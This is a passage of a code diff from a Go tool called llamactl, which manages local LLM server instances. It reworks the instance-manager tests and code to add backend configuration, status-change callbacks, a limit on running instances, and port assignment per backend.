inst.UpdateLastRequestTime()
}
func TestShouldTimeout_NotRunning(t *testing.T) {
backendConfig := &config.BackendConfig{
LlamaCpp: config.BackendSettings{
Command: "llama-server",
},
MLX: config.BackendSettings{
Command: "mlx_lm.server",
},
}
globalSettings := &config.InstancesConfig{
LogsDir: "/tmp/test",
}
@@ -56,12 +79,16 @@ func TestShouldTimeout_NotRunning(t *testing.T) {
idleTimeout := 1 // 1 minute
options := &instance.CreateInstanceOptions{
IdleTimeout: &idleTimeout,
LlamaServerOptions: llamacpp.LlamaServerOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
inst := instance.NewInstance("test-instance", globalSettings, options)
// Mock onStatusChange function
mockOnStatusChange := func(oldStatus, newStatus instance.InstanceStatus) {}
inst := instance.NewInstance("test-instance", backendConfig, globalSettings, options, mockOnStatusChange)
// Instance is not running, should not timeout regardless of configuration
if inst.ShouldTimeout() {
@@ -70,6 +97,15 @@ func TestShouldTimeout_NotRunning(t *testing.T) {
}
func TestShouldTimeout_NoTimeoutConfigured(t *testing.T) {
backendConfig := &config.BackendConfig{
LlamaCpp: config.BackendSettings{
Command: "llama-server",
},
MLX: config.BackendSettings{
Command: "mlx_lm.server",
},
}
globalSettings := &config.InstancesConfig{
LogsDir: "/tmp/test",
}
@@ -85,16 +121,20 @@ func TestShouldTimeout_NoTimeoutConfigured(t *testing.T) {
for _, tt := range tests {
t.Run(tt.name, func(t *testing.T) {
// Mock onStatusChange function
mockOnStatusChange := func(oldStatus, newStatus instance.InstanceStatus) {}
options := &instance.CreateInstanceOptions{
IdleTimeout: tt.idleTimeout,
LlamaServerOptions: llamacpp.LlamaServerOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
inst := instance.NewInstance("test-instance", globalSettings, options)
inst := instance.NewInstance("test-instance", backendConfig, globalSettings, options, mockOnStatusChange)
// Simulate running state
inst.Running = true
inst.SetStatus(instance.Running)
if inst.ShouldTimeout() {
t.Errorf("Instance with %s should not timeout", tt.name)
@@ -104,6 +144,15 @@ func TestShouldTimeout_NoTimeoutConfigured(t *testing.T) {
}
func TestShouldTimeout_WithinTimeLimit(t *testing.T) {
backendConfig := &config.BackendConfig{
LlamaCpp: config.BackendSettings{
Command: "llama-server",
},
MLX: config.BackendSettings{
Command: "mlx_lm.server",
},
}
globalSettings := &config.InstancesConfig{
LogsDir: "/tmp/test",
}
@@ -111,13 +160,17 @@ func TestShouldTimeout_WithinTimeLimit(t *testing.T) {
idleTimeout := 5 // 5 minutes
options := &instance.CreateInstanceOptions{
IdleTimeout: &idleTimeout,
LlamaServerOptions: llamacpp.LlamaServerOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
inst := instance.NewInstance("test-instance", globalSettings, options)
inst.Running = true
// Mock onStatusChange function
mockOnStatusChange := func(oldStatus, newStatus instance.InstanceStatus) {}
inst := instance.NewInstance("test-instance", backendConfig, globalSettings, options, mockOnStatusChange)
inst.SetStatus(instance.Running)
// Update last request time to now
inst.UpdateLastRequestTime()
@@ -129,6 +182,15 @@ func TestShouldTimeout_WithinTimeLimit(t *testing.T) {
}
func TestShouldTimeout_ExceedsTimeLimit(t *testing.T) {
backendConfig := &config.BackendConfig{
LlamaCpp: config.BackendSettings{
Command: "llama-server",
},
MLX: config.BackendSettings{
Command: "mlx_lm.server",
},
}
globalSettings := &config.InstancesConfig{
LogsDir: "/tmp/test",
}
@@ -136,13 +198,17 @@ func TestShouldTimeout_ExceedsTimeLimit(t *testing.T) {
idleTimeout := 1 // 1 minute
options := &instance.CreateInstanceOptions{
IdleTimeout: &idleTimeout,
LlamaServerOptions: llamacpp.LlamaServerOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
inst := instance.NewInstance("test-instance", globalSettings, options)
inst.Running = true
// Mock onStatusChange function
mockOnStatusChange := func(oldStatus, newStatus instance.InstanceStatus) {}
inst := instance.NewInstance("test-instance", backendConfig, globalSettings, options, mockOnStatusChange)
inst.SetStatus(instance.Running)
// Use MockTimeProvider to simulate old last request time
mockTime := NewMockTimeProvider(time.Now())
@@ -160,6 +226,15 @@ func TestShouldTimeout_ExceedsTimeLimit(t *testing.T) {
}
func TestTimeoutConfiguration_Validation(t *testing.T) {
backendConfig := &config.BackendConfig{
LlamaCpp: config.BackendSettings{
Command: "llama-server",
},
MLX: config.BackendSettings{
Command: "mlx_lm.server",
},
}
globalSettings := &config.InstancesConfig{
LogsDir: "/tmp/test",
}
@@ -179,12 +254,16 @@ func TestTimeoutConfiguration_Validation(t *testing.T) {
t.Run(tt.name, func(t *testing.T) {
options := &instance.CreateInstanceOptions{
IdleTimeout: tt.inputTimeout,
LlamaServerOptions: llamacpp.LlamaServerOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
inst := instance.NewInstance("test-instance", globalSettings, options)
// Mock onStatusChange function
mockOnStatusChange := func(oldStatus, newStatus instance.InstanceStatus) {}
inst := instance.NewInstance("test-instance", backendConfig, globalSettings, options, mockOnStatusChange)
opts := inst.GetOptions()
if opts.IdleTimeout == nil || *opts.IdleTimeout != tt.expectedTimeout {

View File

@@ -21,17 +21,21 @@ type InstanceManager interface {
UpdateInstance(name string, options *instance.CreateInstanceOptions) (*instance.Process, error)
DeleteInstance(name string) error
StartInstance(name string) (*instance.Process, error)
IsMaxRunningInstancesReached() bool
StopInstance(name string) (*instance.Process, error)
EvictLRUInstance() error
RestartInstance(name string) (*instance.Process, error)
GetInstanceLogs(name string) (string, error)
Shutdown()
}
type instanceManager struct {
mu sync.RWMutex
instances map[string]*instance.Process
ports map[int]bool
instancesConfig config.InstancesConfig
mu sync.RWMutex
instances map[string]*instance.Process
runningInstances map[string]struct{}
ports map[int]bool
instancesConfig config.InstancesConfig
backendsConfig config.BackendConfig
// Timeout checker
timeoutChecker *time.Ticker
@@ -41,14 +45,16 @@ type instanceManager struct {
}
// NewInstanceManager creates a new instance of InstanceManager.
func NewInstanceManager(instancesConfig config.InstancesConfig) InstanceManager {
func NewInstanceManager(backendsConfig config.BackendConfig, instancesConfig config.InstancesConfig) InstanceManager {
if instancesConfig.TimeoutCheckInterval <= 0 {
instancesConfig.TimeoutCheckInterval = 5 // Default to 5 minutes if not set
}
im := &instanceManager{
instances: make(map[string]*instance.Process),
ports: make(map[int]bool),
instancesConfig: instancesConfig,
instances: make(map[string]*instance.Process),
runningInstances: make(map[string]struct{}),
ports: make(map[int]bool),
instancesConfig: instancesConfig,
backendsConfig: backendsConfig,
timeoutChecker: time.NewTicker(time.Duration(instancesConfig.TimeoutCheckInterval) * time.Minute),
shutdownChan: make(chan struct{}),
@@ -121,10 +127,10 @@ func (im *instanceManager) persistInstance(instance *instance.Process) error {
func (im *instanceManager) Shutdown() {
im.mu.Lock()
defer im.mu.Unlock()
// Check if already shutdown
if im.isShutdown {
im.mu.Unlock()
return
}
im.isShutdown = true
@@ -132,27 +138,32 @@ func (im *instanceManager) Shutdown() {
// Signal the timeout checker to stop
close(im.shutdownChan)
// Release lock temporarily to wait for goroutine
// Create a list of running instances to stop
var runningInstances []*instance.Process
var runningNames []string
for name, inst := range im.instances {
if inst.IsRunning() {
runningInstances = append(runningInstances, inst)
runningNames = append(runningNames, name)
}
}
// Release lock before stopping instances to avoid deadlock
im.mu.Unlock()
// Wait for the timeout checker goroutine to actually stop
<-im.shutdownDone
// Reacquire lock
im.mu.Lock()
// Now stop the ticker
if im.timeoutChecker != nil {
im.timeoutChecker.Stop()
}
// Stop instances without holding the manager lock
var wg sync.WaitGroup
wg.Add(len(im.instances))
for name, inst := range im.instances {
if !inst.Running {
wg.Done() // If instance is not running, just mark it as done
continue
}
wg.Add(len(runningInstances))
for i, inst := range runningInstances {
go func(name string, inst *instance.Process) {
defer wg.Done()
fmt.Printf("Stopping instance %s...\n", name)
@@ -160,7 +171,7 @@ func (im *instanceManager) Shutdown() {
if err := inst.Stop(); err != nil {
fmt.Printf("Error stopping instance %s: %v\n", name, err)
}
}(name, inst)
}(runningNames[i], inst)
}
wg.Wait()
@@ -227,16 +238,20 @@ func (im *instanceManager) loadInstance(name, path string) error {
return fmt.Errorf("instance name mismatch: file=%s, instance.Name=%s", name, persistedInstance.Name)
}
statusCallback := func(oldStatus, newStatus instance.InstanceStatus) {
im.onStatusChange(persistedInstance.Name, oldStatus, newStatus)
}
// Create new inst using NewInstance (handles validation, defaults, setup)
inst := instance.NewInstance(name, &im.instancesConfig, persistedInstance.GetOptions())
inst := instance.NewInstance(name, &im.backendsConfig, &im.instancesConfig, persistedInstance.GetOptions(), statusCallback)
// Restore persisted fields that NewInstance doesn't set
inst.Created = persistedInstance.Created
inst.Running = persistedInstance.Running
inst.SetStatus(persistedInstance.Status)
// Check for port conflicts and add to maps
if inst.GetOptions() != nil && inst.GetOptions().Port > 0 {
port := inst.GetOptions().Port
if inst.GetPort() > 0 {
port := inst.GetPort()
if im.ports[port] {
return fmt.Errorf("port conflict: instance %s wants port %d which is already in use", name, port)
}
@@ -252,7 +267,7 @@ func (im *instanceManager) autoStartInstances() {
im.mu.RLock()
var instancesToStart []*instance.Process
for _, inst := range im.instances {
if inst.Running && // Was running when persisted
if inst.IsRunning() && // Was running when persisted
inst.GetOptions() != nil &&
inst.GetOptions().AutoRestart != nil &&
*inst.GetOptions().AutoRestart {
@@ -264,9 +279,20 @@ func (im *instanceManager) autoStartInstances() {
for _, inst := range instancesToStart {
log.Printf("Auto-starting instance %s", inst.Name)
// Reset running state before starting (since Start() expects stopped instance)
inst.Running = false
inst.SetStatus(instance.Stopped)
if err := inst.Start(); err != nil {
log.Printf("Failed to auto-start instance %s: %v", inst.Name, err)
}
}
}
func (im *instanceManager) onStatusChange(name string, oldStatus, newStatus instance.InstanceStatus) {
im.mu.Lock()
defer im.mu.Unlock()
if newStatus == instance.Running {
im.runningInstances[name] = struct{}{}
} else {
delete(im.runningInstances, name)
}
}

View File

@@ -2,6 +2,7 @@ package manager_test
import (
"fmt"
"llamactl/pkg/backends"
"llamactl/pkg/backends/llamacpp"
"llamactl/pkg/config"
"llamactl/pkg/instance"
@@ -11,28 +12,35 @@ import (
"strings"
"sync"
"testing"
"time"
)
func TestNewInstanceManager(t *testing.T) {
backendConfig := config.BackendConfig{
LlamaCpp: config.BackendSettings{
Command: "llama-server",
},
MLX: config.BackendSettings{
Command: "mlx_lm.server",
},
}
cfg := config.InstancesConfig{
PortRange: [2]int{8000, 9000},
LogsDir: "/tmp/test",
MaxInstances: 5,
LlamaExecutable: "llama-server",
DefaultAutoRestart: true,
DefaultMaxRestarts: 3,
DefaultRestartDelay: 5,
TimeoutCheckInterval: 5,
}
manager := manager.NewInstanceManager(cfg)
if manager == nil {
mgr := manager.NewInstanceManager(backendConfig, cfg)
if mgr == nil {
t.Fatal("NewInstanceManager returned nil")
}
// Test initial state
instances, err := manager.ListInstances()
instances, err := mgr.ListInstances()
if err != nil {
t.Fatalf("ListInstances failed: %v", err)
}
@@ -41,220 +49,18 @@ func TestNewInstanceManager(t *testing.T) {
}
}
func TestCreateInstance_Success(t *testing.T) {
manager := createTestManager()
options := &instance.CreateInstanceOptions{
LlamaServerOptions: llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
Port: 8080,
},
}
inst, err := manager.CreateInstance("test-instance", options)
if err != nil {
t.Fatalf("CreateInstance failed: %v", err)
}
if inst.Name != "test-instance" {
t.Errorf("Expected instance name 'test-instance', got %q", inst.Name)
}
if inst.Running {
t.Error("New instance should not be running")
}
if inst.GetOptions().Port != 8080 {
t.Errorf("Expected port 8080, got %d", inst.GetOptions().Port)
}
}
func TestCreateInstance_ValidationAndLimits(t *testing.T) {
// Test duplicate names
mngr := createTestManager()
options := &instance.CreateInstanceOptions{
LlamaServerOptions: llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
_, err := mngr.CreateInstance("test-instance", options)
if err != nil {
t.Fatalf("First CreateInstance failed: %v", err)
}
// Try to create duplicate
_, err = mngr.CreateInstance("test-instance", options)
if err == nil {
t.Error("Expected error for duplicate instance name")
}
if !strings.Contains(err.Error(), "already exists") {
t.Errorf("Expected duplicate name error, got: %v", err)
}
// Test max instances limit
cfg := config.InstancesConfig{
PortRange: [2]int{8000, 9000},
MaxInstances: 1, // Very low limit for testing
TimeoutCheckInterval: 5,
}
limitedManager := manager.NewInstanceManager(cfg)
_, err = limitedManager.CreateInstance("instance1", options)
if err != nil {
t.Fatalf("CreateInstance 1 failed: %v", err)
}
// This should fail due to max instances limit
_, err = limitedManager.CreateInstance("instance2", options)
if err == nil {
t.Error("Expected error when exceeding max instances limit")
}
if !strings.Contains(err.Error(), "maximum number of instances") {
t.Errorf("Expected max instances error, got: %v", err)
}
}
func TestPortManagement(t *testing.T) {
manager := createTestManager()
// Test auto port assignment
options1 := &instance.CreateInstanceOptions{
LlamaServerOptions: llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
inst1, err := manager.CreateInstance("instance1", options1)
if err != nil {
t.Fatalf("CreateInstance failed: %v", err)
}
port1 := inst1.GetOptions().Port
if port1 < 8000 || port1 > 9000 {
t.Errorf("Expected port in range 8000-9000, got %d", port1)
}
// Test port conflict detection
options2 := &instance.CreateInstanceOptions{
LlamaServerOptions: llamacpp.LlamaServerOptions{
Model: "/path/to/model2.gguf",
Port: port1, // Same port - should conflict
},
}
_, err = manager.CreateInstance("instance2", options2)
if err == nil {
t.Error("Expected error for port conflict")
}
if !strings.Contains(err.Error(), "port") && !strings.Contains(err.Error(), "in use") {
t.Errorf("Expected port conflict error, got: %v", err)
}
// Test port release on deletion
specificPort := 8080
options3 := &instance.CreateInstanceOptions{
LlamaServerOptions: llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
Port: specificPort,
},
}
_, err = manager.CreateInstance("port-test", options3)
if err != nil {
t.Fatalf("CreateInstance failed: %v", err)
}
err = manager.DeleteInstance("port-test")
if err != nil {
t.Fatalf("DeleteInstance failed: %v", err)
}
// Should be able to create new instance with same port
_, err = manager.CreateInstance("new-port-test", options3)
if err != nil {
t.Errorf("Expected to reuse port after deletion, got error: %v", err)
}
}
func TestInstanceOperations(t *testing.T) {
manager := createTestManager()
options := &instance.CreateInstanceOptions{
LlamaServerOptions: llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
// Create instance
created, err := manager.CreateInstance("test-instance", options)
if err != nil {
t.Fatalf("CreateInstance failed: %v", err)
}
// Get instance
retrieved, err := manager.GetInstance("test-instance")
if err != nil {
t.Fatalf("GetInstance failed: %v", err)
}
if retrieved.Name != created.Name {
t.Errorf("Expected name %q, got %q", created.Name, retrieved.Name)
}
// Update instance
newOptions := &instance.CreateInstanceOptions{
LlamaServerOptions: llamacpp.LlamaServerOptions{
Model: "/path/to/new-model.gguf",
Port: 8081,
},
}
updated, err := manager.UpdateInstance("test-instance", newOptions)
if err != nil {
t.Fatalf("UpdateInstance failed: %v", err)
}
if updated.GetOptions().Model != "/path/to/new-model.gguf" {
t.Errorf("Expected model '/path/to/new-model.gguf', got %q", updated.GetOptions().Model)
}
// List instances
instances, err := manager.ListInstances()
if err != nil {
t.Fatalf("ListInstances failed: %v", err)
}
if len(instances) != 1 {
t.Errorf("Expected 1 instance, got %d", len(instances))
}
// Delete instance
err = manager.DeleteInstance("test-instance")
if err != nil {
t.Fatalf("DeleteInstance failed: %v", err)
}
_, err = manager.GetInstance("test-instance")
if err == nil {
t.Error("Instance should not exist after deletion")
}
// Test operations on non-existent instances
_, err = manager.GetInstance("nonexistent")
if err == nil || !strings.Contains(err.Error(), "not found") {
t.Errorf("Expected 'not found' error, got: %v", err)
}
err = manager.DeleteInstance("nonexistent")
if err == nil || !strings.Contains(err.Error(), "not found") {
t.Errorf("Expected 'not found' error, got: %v", err)
}
_, err = manager.UpdateInstance("nonexistent", options)
if err == nil || !strings.Contains(err.Error(), "not found") {
t.Errorf("Expected 'not found' error, got: %v", err)
}
}
func TestPersistence(t *testing.T) {
tempDir := t.TempDir()
backendConfig := config.BackendConfig{
LlamaCpp: config.BackendSettings{
Command: "llama-server",
},
MLX: config.BackendSettings{
Command: "mlx_lm.server",
},
}
cfg := config.InstancesConfig{
PortRange: [2]int{8000, 9000},
InstancesDir: tempDir,
@@ -263,9 +69,10 @@ func TestPersistence(t *testing.T) {
}
// Test instance persistence on creation
manager1 := manager.NewInstanceManager(cfg)
manager1 := manager.NewInstanceManager(backendConfig, cfg)
options := &instance.CreateInstanceOptions{
LlamaServerOptions: llamacpp.LlamaServerOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
Port: 8080,
},
@@ -283,7 +90,7 @@ func TestPersistence(t *testing.T) {
}
// Test loading instances from disk
manager2 := manager.NewInstanceManager(cfg)
manager2 := manager.NewInstanceManager(backendConfig, cfg)
instances, err := manager2.ListInstances()
if err != nil {
t.Fatalf("ListInstances failed: %v", err)
@@ -312,119 +119,27 @@ func TestPersistence(t *testing.T) {
}
}
func TestTimeoutFunctionality(t *testing.T) {
// Test timeout checker initialization
cfg := config.InstancesConfig{
PortRange: [2]int{8000, 9000},
TimeoutCheckInterval: 10,
MaxInstances: 5,
}
manager := manager.NewInstanceManager(cfg)
if manager == nil {
t.Fatal("Manager should be initialized with timeout checker")
}
manager.Shutdown() // Clean up
// Test timeout configuration and logic without starting the actual process
testManager := createTestManager()
defer testManager.Shutdown()
idleTimeout := 1 // 1 minute
options := &instance.CreateInstanceOptions{
IdleTimeout: &idleTimeout,
LlamaServerOptions: llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
inst, err := testManager.CreateInstance("timeout-test", options)
if err != nil {
t.Fatalf("CreateInstance failed: %v", err)
}
// Test timeout configuration is properly set
if inst.GetOptions().IdleTimeout == nil {
t.Fatal("Instance should have idle timeout configured")
}
if *inst.GetOptions().IdleTimeout != 1 {
t.Errorf("Expected idle timeout 1 minute, got %d", *inst.GetOptions().IdleTimeout)
}
// Test timeout logic without actually starting the process
// Create a mock time provider to simulate timeout
mockTime := NewMockTimeProvider(time.Now())
inst.SetTimeProvider(mockTime)
// Set instance to running state so timeout logic can work
inst.Running = true
// Simulate instance being "running" for timeout check (without actual process)
// We'll test the ShouldTimeout logic directly
inst.UpdateLastRequestTime()
// Initially should not timeout (just updated)
if inst.ShouldTimeout() {
t.Error("Instance should not timeout immediately after request")
}
// Advance time to trigger timeout
mockTime.SetTime(time.Now().Add(2 * time.Minute))
// Now it should timeout
if !inst.ShouldTimeout() {
t.Error("Instance should timeout after idle period")
}
// Reset running state to avoid shutdown issues
inst.Running = false
// Test that instance without timeout doesn't timeout
noTimeoutOptions := &instance.CreateInstanceOptions{
LlamaServerOptions: llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
// No IdleTimeout set
}
noTimeoutInst, err := testManager.CreateInstance("no-timeout-test", noTimeoutOptions)
if err != nil {
t.Fatalf("CreateInstance failed: %v", err)
}
noTimeoutInst.SetTimeProvider(mockTime)
noTimeoutInst.Running = true // Set to running for timeout check
noTimeoutInst.UpdateLastRequestTime()
// Even with time advanced, should not timeout
if noTimeoutInst.ShouldTimeout() {
t.Error("Instance without timeout configuration should never timeout")
}
// Reset running state to avoid shutdown issues
noTimeoutInst.Running = false
}
func TestConcurrentAccess(t *testing.T) {
manager := createTestManager()
defer manager.Shutdown()
mgr := createTestManager()
defer mgr.Shutdown()
// Test concurrent operations
var wg sync.WaitGroup
errChan := make(chan error, 10)
// Concurrent instance creation
for i := 0; i < 5; i++ {
for i := range 5 {
wg.Add(1)
go func(index int) {
defer wg.Done()
options := &instance.CreateInstanceOptions{
LlamaServerOptions: llamacpp.LlamaServerOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
instanceName := fmt.Sprintf("concurrent-test-%d", index)
if _, err := manager.CreateInstance(instanceName, options); err != nil {
if _, err := mgr.CreateInstance(instanceName, options); err != nil {
errChan <- err
}
}(i)
@@ -435,7 +150,7 @@ func TestConcurrentAccess(t *testing.T) {
wg.Add(1)
go func() {
defer wg.Done()
if _, err := manager.ListInstances(); err != nil {
if _, err := mgr.ListInstances(); err != nil {
errChan <- err
}
}()
@@ -451,59 +166,46 @@ func TestConcurrentAccess(t *testing.T) {
}
func TestShutdown(t *testing.T) {
manager := createTestManager()
mgr := createTestManager()
// Create test instance
options := &instance.CreateInstanceOptions{
LlamaServerOptions: llamacpp.LlamaServerOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
_, err := manager.CreateInstance("test-instance", options)
_, err := mgr.CreateInstance("test-instance", options)
if err != nil {
t.Fatalf("CreateInstance failed: %v", err)
}
// Shutdown should not panic
manager.Shutdown()
mgr.Shutdown()
// Multiple shutdowns should not panic
manager.Shutdown()
mgr.Shutdown()
}
// Helper function to create a test manager with standard config
func createTestManager() manager.InstanceManager {
backendConfig := config.BackendConfig{
LlamaCpp: config.BackendSettings{
Command: "llama-server",
},
MLX: config.BackendSettings{
Command: "mlx_lm.server",
},
}
cfg := config.InstancesConfig{
PortRange: [2]int{8000, 9000},
LogsDir: "/tmp/test",
MaxInstances: 10,
LlamaExecutable: "llama-server",
DefaultAutoRestart: true,
DefaultMaxRestarts: 3,
DefaultRestartDelay: 5,
TimeoutCheckInterval: 5,
}
return manager.NewInstanceManager(cfg)
}
// Helper for timeout tests
type MockTimeProvider struct {
currentTime time.Time
mu sync.RWMutex
}
func NewMockTimeProvider(t time.Time) *MockTimeProvider {
return &MockTimeProvider{currentTime: t}
}
func (m *MockTimeProvider) Now() time.Time {
m.mu.RLock()
defer m.mu.RUnlock()
return m.currentTime
}
func (m *MockTimeProvider) SetTime(t time.Time) {
m.mu.Lock()
defer m.mu.Unlock()
m.currentTime = t
return manager.NewInstanceManager(backendConfig, cfg)
}

View File

@@ -2,12 +2,15 @@ package manager
import (
"fmt"
"llamactl/pkg/backends"
"llamactl/pkg/instance"
"llamactl/pkg/validation"
"os"
"path/filepath"
)
type MaxRunningInstancesError error
// ListInstances returns a list of all instances managed by the instance manager.
func (im *instanceManager) ListInstances() ([]*instance.Process, error) {
im.mu.RLock()
@@ -50,24 +53,17 @@ func (im *instanceManager) CreateInstance(name string, options *instance.CreateI
return nil, fmt.Errorf("instance with name %s already exists", name)
}
// Assign a port if not specified
if options.Port == 0 {
port, err := im.getNextAvailablePort()
if err != nil {
return nil, fmt.Errorf("failed to get next available port: %w", err)
}
options.Port = port
} else {
// Validate the specified port
if _, exists := im.ports[options.Port]; exists {
return nil, fmt.Errorf("port %d is already in use", options.Port)
}
im.ports[options.Port] = true
// Assign and validate port for backend-specific options
if err := im.assignAndValidatePort(options); err != nil {
return nil, err
}
inst := instance.NewInstance(name, &im.instancesConfig, options)
statusCallback := func(oldStatus, newStatus instance.InstanceStatus) {
im.onStatusChange(name, oldStatus, newStatus)
}
inst := instance.NewInstance(name, &im.backendsConfig, &im.instancesConfig, options, statusCallback)
im.instances[inst.Name] = inst
im.ports[options.Port] = true
if err := im.persistInstance(inst); err != nil {
return nil, fmt.Errorf("failed to persist instance %s: %w", name, err)
@@ -109,7 +105,7 @@ func (im *instanceManager) UpdateInstance(name string, options *instance.CreateI
}
// Check if instance is running before updating options
wasRunning := instance.Running
wasRunning := instance.IsRunning()
// If the instance is running, stop it first
if wasRunning {
@@ -147,11 +143,11 @@ func (im *instanceManager) DeleteInstance(name string) error {
return fmt.Errorf("instance with name %s not found", name)
}
if instance.Running {
if instance.IsRunning() {
return fmt.Errorf("instance with name %s is still running, stop it before deleting", name)
}
delete(im.ports, instance.GetOptions().Port)
delete(im.ports, instance.GetPort())
delete(im.instances, name)
// Delete the instance's config file if persistence is enabled
@@ -168,15 +164,20 @@ func (im *instanceManager) DeleteInstance(name string) error {
func (im *instanceManager) StartInstance(name string) (*instance.Process, error) {
im.mu.RLock()
instance, exists := im.instances[name]
maxRunningExceeded := len(im.runningInstances) >= im.instancesConfig.MaxRunningInstances && im.instancesConfig.MaxRunningInstances != -1
im.mu.RUnlock()
if !exists {
return nil, fmt.Errorf("instance with name %s not found", name)
}
if instance.Running {
if instance.IsRunning() {
return instance, fmt.Errorf("instance with name %s is already running", name)
}
if maxRunningExceeded {
return nil, MaxRunningInstancesError(fmt.Errorf("maximum number of running instances (%d) reached", im.instancesConfig.MaxRunningInstances))
}
if err := instance.Start(); err != nil {
return nil, fmt.Errorf("failed to start instance %s: %w", name, err)
}
@@ -191,6 +192,17 @@ func (im *instanceManager) StartInstance(name string) (*instance.Process, error)
return instance, nil
}
func (im *instanceManager) IsMaxRunningInstancesReached() bool {
im.mu.RLock()
defer im.mu.RUnlock()
if im.instancesConfig.MaxRunningInstances != -1 && len(im.runningInstances) >= im.instancesConfig.MaxRunningInstances {
return true
}
return false
}
// StopInstance stops a running instance and returns it.
func (im *instanceManager) StopInstance(name string) (*instance.Process, error) {
im.mu.RLock()
@@ -200,7 +212,7 @@ func (im *instanceManager) StopInstance(name string) (*instance.Process, error)
if !exists {
return nil, fmt.Errorf("instance with name %s not found", name)
}
if !instance.Running {
if !instance.IsRunning() {
return instance, fmt.Errorf("instance with name %s is already stopped", name)
}
@@ -240,3 +252,65 @@ func (im *instanceManager) GetInstanceLogs(name string) (string, error) {
// TODO: Implement actual log retrieval logic
return fmt.Sprintf("Logs for instance %s", name), nil
}
// getPortFromOptions extracts the port from backend-specific options
func (im *instanceManager) getPortFromOptions(options *instance.CreateInstanceOptions) int {
switch options.BackendType {
case backends.BackendTypeLlamaCpp:
if options.LlamaServerOptions != nil {
return options.LlamaServerOptions.Port
}
case backends.BackendTypeMlxLm:
if options.MlxServerOptions != nil {
return options.MlxServerOptions.Port
}
case backends.BackendTypeVllm:
if options.VllmServerOptions != nil {
return options.VllmServerOptions.Port
}
}
return 0
}
// setPortInOptions sets the port in backend-specific options
func (im *instanceManager) setPortInOptions(options *instance.CreateInstanceOptions, port int) {
switch options.BackendType {
case backends.BackendTypeLlamaCpp:
if options.LlamaServerOptions != nil {
options.LlamaServerOptions.Port = port
}
case backends.BackendTypeMlxLm:
if options.MlxServerOptions != nil {
options.MlxServerOptions.Port = port
}
case backends.BackendTypeVllm:
if options.VllmServerOptions != nil {
options.VllmServerOptions.Port = port
}
}
}
// assignAndValidatePort assigns a port if not specified and validates it's not in use
func (im *instanceManager) assignAndValidatePort(options *instance.CreateInstanceOptions) error {
currentPort := im.getPortFromOptions(options)
if currentPort == 0 {
// Assign a port if not specified
port, err := im.getNextAvailablePort()
if err != nil {
return fmt.Errorf("failed to get next available port: %w", err)
}
im.setPortInOptions(options, port)
// Mark the port as used
im.ports[port] = true
} else {
// Validate the specified port
if _, exists := im.ports[currentPort]; exists {
return fmt.Errorf("port %d is already in use", currentPort)
}
// Mark the port as used
im.ports[currentPort] = true
}
return nil
}

View File

@@ -0,0 +1,237 @@
package manager_test
import (
"llamactl/pkg/backends"
"llamactl/pkg/backends/llamacpp"
"llamactl/pkg/config"
"llamactl/pkg/instance"
"llamactl/pkg/manager"
"strings"
"testing"
)
func TestCreateInstance_Success(t *testing.T) {
manager := createTestManager()
options := &instance.CreateInstanceOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
Port: 8080,
},
}
inst, err := manager.CreateInstance("test-instance", options)
if err != nil {
t.Fatalf("CreateInstance failed: %v", err)
}
if inst.Name != "test-instance" {
t.Errorf("Expected instance name 'test-instance', got %q", inst.Name)
}
if inst.GetStatus() != instance.Stopped {
t.Error("New instance should not be running")
}
if inst.GetPort() != 8080 {
t.Errorf("Expected port 8080, got %d", inst.GetPort())
}
}
func TestCreateInstance_ValidationAndLimits(t *testing.T) {
// Test duplicate names
mngr := createTestManager()
options := &instance.CreateInstanceOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
_, err := mngr.CreateInstance("test-instance", options)
if err != nil {
t.Fatalf("First CreateInstance failed: %v", err)
}
// Try to create duplicate
_, err = mngr.CreateInstance("test-instance", options)
if err == nil {
t.Error("Expected error for duplicate instance name")
}
if !strings.Contains(err.Error(), "already exists") {
t.Errorf("Expected duplicate name error, got: %v", err)
}
// Test max instances limit
backendConfig := config.BackendConfig{
LlamaCpp: config.BackendSettings{
Command: "llama-server",
},
MLX: config.BackendSettings{
Command: "mlx_lm.server",
},
}
cfg := config.InstancesConfig{
PortRange: [2]int{8000, 9000},
MaxInstances: 1, // Very low limit for testing
TimeoutCheckInterval: 5,
}
limitedManager := manager.NewInstanceManager(backendConfig, cfg)
_, err = limitedManager.CreateInstance("instance1", options)
if err != nil {
t.Fatalf("CreateInstance 1 failed: %v", err)
}
// This should fail due to max instances limit
_, err = limitedManager.CreateInstance("instance2", options)
if err == nil {
t.Error("Expected error when exceeding max instances limit")
}
if !strings.Contains(err.Error(), "maximum number of instances") {
t.Errorf("Expected max instances error, got: %v", err)
}
}
func TestPortManagement(t *testing.T) {
manager := createTestManager()
// Test auto port assignment
options1 := &instance.CreateInstanceOptions{
BackendType: backends.BackendTypeLlamaCpp,
